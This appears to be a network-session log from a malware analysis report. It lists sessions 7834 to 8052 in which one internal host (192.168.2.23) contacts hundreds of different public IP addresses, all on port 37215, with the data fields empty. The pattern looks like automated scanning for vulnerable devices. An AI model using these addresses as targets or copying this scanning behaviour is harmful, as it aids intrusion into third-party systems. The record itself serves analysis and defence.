                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7834192.168.2.235869841.241.125.10537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7835192.168.2.235892241.123.203.2637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7836192.168.2.234454641.216.29.1637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7837192.168.2.2339648157.24.33.12637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7838192.168.2.234154641.195.0.15437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7839192.168.2.2353896157.68.70.8937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7840192.168.2.2339696156.129.145.12637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7841192.168.2.233813875.112.174.137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7842192.168.2.2353136197.225.136.22837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7843192.168.2.2358622197.123.26.837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7844192.168.2.2359240157.5.134.20937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7845192.168.2.235626441.9.29.11537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7846192.168.2.2339880197.116.15.4837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7847192.168.2.233635841.72.13.3837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7848192.168.2.234010441.195.86.16037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7849192.168.2.235751441.2.57.8937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7850192.168.2.2354062197.244.236.23637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7851192.168.2.2355238157.25.97.17037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7852192.168.2.2339766197.102.27.23037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7853192.168.2.2356134197.66.131.18637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7854192.168.2.2352912157.7.227.9237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7855192.168.2.233828041.50.60.21137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7856192.168.2.2348420197.241.55.1337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7857192.168.2.234862441.70.0.4437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7858192.168.2.235688818.22.76.7337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7859192.168.2.2345500197.15.92.6437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7860192.168.2.2343360157.59.74.1437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7861192.168.2.233990041.240.110.12537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7862192.168.2.233656045.241.227.20237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7863192.168.2.2356232136.193.65.21537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7864192.168.2.2341474210.33.221.14637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7865192.168.2.2341004197.240.195.23637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7866192.168.2.2349284157.221.36.11337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7867192.168.2.235430041.19.38.17437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7868192.168.2.2355206157.209.88.9637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7869192.168.2.234879441.22.55.9337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7870192.168.2.2358932157.79.77.9737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7871192.168.2.234299641.125.90.21637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7872192.168.2.2346690135.166.232.8237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7873192.168.2.234833241.15.89.13537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7874192.168.2.2334794157.83.112.7437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7875192.168.2.2338392157.47.178.6937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7876192.168.2.2347288157.99.67.5037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7877192.168.2.234396641.179.207.1837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7878192.168.2.2349480197.183.248.1437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7879192.168.2.234780854.232.123.19937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7880192.168.2.234976641.199.247.25537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7881192.168.2.233301484.6.73.22037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7882192.168.2.2335390197.123.242.3437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7883192.168.2.234279650.237.128.18537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7884192.168.2.236045841.118.61.11437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7885192.168.2.235019641.120.180.537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7886192.168.2.2352078157.188.130.9037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7887192.168.2.235459041.130.126.8937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7888192.168.2.235546898.123.132.8537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7889192.168.2.235673441.66.235.15837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7890192.168.2.2341466157.150.239.11037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7891192.168.2.2359354100.205.253.22937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7892192.168.2.2359144136.217.115.20137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7893192.168.2.2353232197.186.238.6537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7894192.168.2.235441841.187.19.2837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7895192.168.2.234961041.56.171.637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7896192.168.2.2359044116.117.154.15237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7897192.168.2.2354896175.245.161.4137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7898192.168.2.2335674197.30.22.4837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7899192.168.2.2356404157.13.243.9937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7900192.168.2.235117450.122.202.13637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7901192.168.2.2346550157.243.79.18837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7902192.168.2.2345556197.125.196.1837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7903192.168.2.234088041.222.35.4937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7904192.168.2.235989241.77.75.2537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7905192.168.2.234066041.8.117.7937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7906192.168.2.2345910197.243.230.2337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7907192.168.2.2335500197.190.100.17137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7908192.168.2.235624641.86.220.12337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7909192.168.2.2337810157.62.94.17037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7910192.168.2.235854241.112.69.19337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7911192.168.2.2354034157.28.103.6437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7912192.168.2.2343946157.88.65.6037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7913192.168.2.2342200210.206.238.3637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7914192.168.2.234188441.18.103.8737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7915192.168.2.2347420157.169.212.15637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7916192.168.2.2351336157.218.3.11637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7917192.168.2.233535841.136.249.19937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7918192.168.2.23492464.148.250.18237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7919192.168.2.234669441.12.251.14537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7920192.168.2.2334426157.239.223.4837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7921192.168.2.2342956147.214.205.2937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7922192.168.2.2355380197.252.123.737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7923192.168.2.2338070197.43.78.8737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7924192.168.2.234824050.171.29.24937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7925192.168.2.2355806197.102.47.24037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7926192.168.2.2334964157.127.177.23037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7927192.168.2.2348810157.197.85.12537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7928192.168.2.234439441.19.152.24537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7929192.168.2.234076641.217.192.10837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7930192.168.2.2334472157.185.18.19437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7931192.168.2.2333174111.244.214.4537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7932192.168.2.2354998157.232.79.14237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7933192.168.2.2353764197.151.72.13137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7934192.168.2.2351640157.70.183.7537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7935192.168.2.2349356159.200.179.15337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7936192.168.2.2355596157.15.80.17737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7937192.168.2.2336128157.115.21.2237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7938192.168.2.234248441.71.60.18637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7939192.168.2.2351996197.222.167.13137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7940192.168.2.233443641.28.158.24737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7941192.168.2.2359538157.194.52.18437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7942192.168.2.235014241.150.35.4437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7943192.168.2.234610641.241.189.2637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7944192.168.2.2357516206.200.150.15437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7945192.168.2.2338072157.79.28.10737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7946192.168.2.2354676197.125.18.25037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7947192.168.2.2360964197.204.52.25037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7948192.168.2.234808441.224.141.11837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7949192.168.2.2360608156.87.130.1437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7950192.168.2.234547841.235.89.20037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7951192.168.2.233856241.197.97.8237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7952192.168.2.234486241.191.141.14637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7953192.168.2.235545841.47.202.2137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7954192.168.2.233341299.21.219.1637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7955192.168.2.2347988157.180.8.5337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7956192.168.2.234759641.190.215.17037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7957192.168.2.2342386197.201.36.1337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7958192.168.2.2350856113.187.16.17837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7959192.168.2.2358306197.94.204.1337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7960192.168.2.2345264197.196.129.24937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7961192.168.2.235335241.123.77.5037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7962192.168.2.234500241.106.100.21837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7963192.168.2.2359590157.129.217.23437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7964192.168.2.2358722157.248.168.5537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7965192.168.2.2343750157.94.6.21037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7966192.168.2.233502241.215.249.3937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7967192.168.2.2339176184.4.222.15737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7968192.168.2.233759049.52.133.13037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7969192.168.2.2344786157.161.251.17837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7970192.168.2.2348834169.177.159.18437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7971192.168.2.2343948169.18.32.5937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7972192.168.2.233719841.210.110.3337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7973192.168.2.2334032197.87.54.12737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7974192.168.2.2352186157.102.234.18237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7975192.168.2.236041641.100.94.20737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7976192.168.2.235042241.16.104.11437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7977192.168.2.2349322157.84.119.5037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7978192.168.2.2338672197.134.130.5137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7979192.168.2.234634441.51.240.14337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7980192.168.2.234570218.15.19.16437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7981192.168.2.2355664157.193.94.11737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7982192.168.2.2355574197.157.150.13137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7983192.168.2.23443249.159.100.5037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7984192.168.2.2347142157.51.20.9537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7985192.168.2.234492641.172.247.5937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7986192.168.2.235066641.156.159.24437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7987192.168.2.2357174176.23.222.24237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7988192.168.2.2339866157.67.138.14537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7989192.168.2.234422441.182.182.3537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7990192.168.2.2335394197.52.160.20037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7991192.168.2.2338776157.229.250.24137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7992192.168.2.2351352197.56.223.10537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7993192.168.2.2354696197.85.70.13337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7994192.168.2.2350120130.41.1.12637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7995192.168.2.2355580197.24.166.24537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7996192.168.2.233564241.152.106.18237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7997192.168.2.2357182197.18.123.9537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7998192.168.2.2347764157.165.188.337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7999192.168.2.235485241.183.66.19437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8000192.168.2.235582618.91.180.11537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8001192.168.2.2357988157.62.132.22837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8002192.168.2.2338124197.177.126.19137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8003192.168.2.2357320157.242.115.21037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8004192.168.2.2344320157.62.255.20037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8005192.168.2.2335378197.144.114.1137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8006192.168.2.2349854172.199.99.20637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8007192.168.2.235937641.225.193.16637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8008192.168.2.234365441.5.215.20937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8009192.168.2.2344514148.0.165.7337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8010192.168.2.2337836197.53.62.12237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8011192.168.2.2333272197.185.200.9137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8012192.168.2.2335760197.87.184.2437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8013192.168.2.234608041.131.35.19637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8014192.168.2.235274441.120.208.18337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8015192.168.2.234545841.72.41.11337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8016192.168.2.2339222157.30.151.24137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8017192.168.2.2354632171.227.225.437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8018192.168.2.234405267.26.59.15337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8019192.168.2.2352102197.90.100.1937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8020192.168.2.2358970220.41.210.23137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8021192.168.2.236013041.34.251.21037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8022192.168.2.234501441.144.189.5937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8023192.168.2.2346556157.99.84.20237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8024192.168.2.2356536162.139.60.14937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8025192.168.2.2339230157.50.183.14337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8026192.168.2.233594841.193.7.24537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8027192.168.2.2358590197.107.15.21437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8028192.168.2.2336628197.157.125.18837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8029192.168.2.233724641.219.100.10437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8030192.168.2.2346256197.65.21.23837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8031192.168.2.2344644186.28.3.21637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8032192.168.2.234945837.254.120.13237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8033192.168.2.2343772197.118.0.15737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8034192.168.2.2340018157.74.138.13437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8035192.168.2.235626841.14.47.20937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8036192.168.2.2342236197.251.37.16437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8037192.168.2.2346370152.164.70.2437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8038192.168.2.234248841.158.214.337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8039192.168.2.233913841.235.27.16937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8040192.168.2.2354162157.58.27.24037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8041192.168.2.2345456197.193.44.20637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8042192.168.2.235748241.155.37.4237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8043192.168.2.235705641.248.215.7437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8044192.168.2.2347488197.90.10.4937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8045192.168.2.2354308157.52.28.1937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8046192.168.2.235896841.219.23.24437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8047192.168.2.2356010157.138.18.11237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8048192.168.2.2351852120.205.79.4837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8049192.168.2.2349096157.105.94.18337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8050192.168.2.233376841.97.97.1437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8051192.168.2.2343570197.113.100.20937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8052192.168.2.2345078192.150.137.10637215
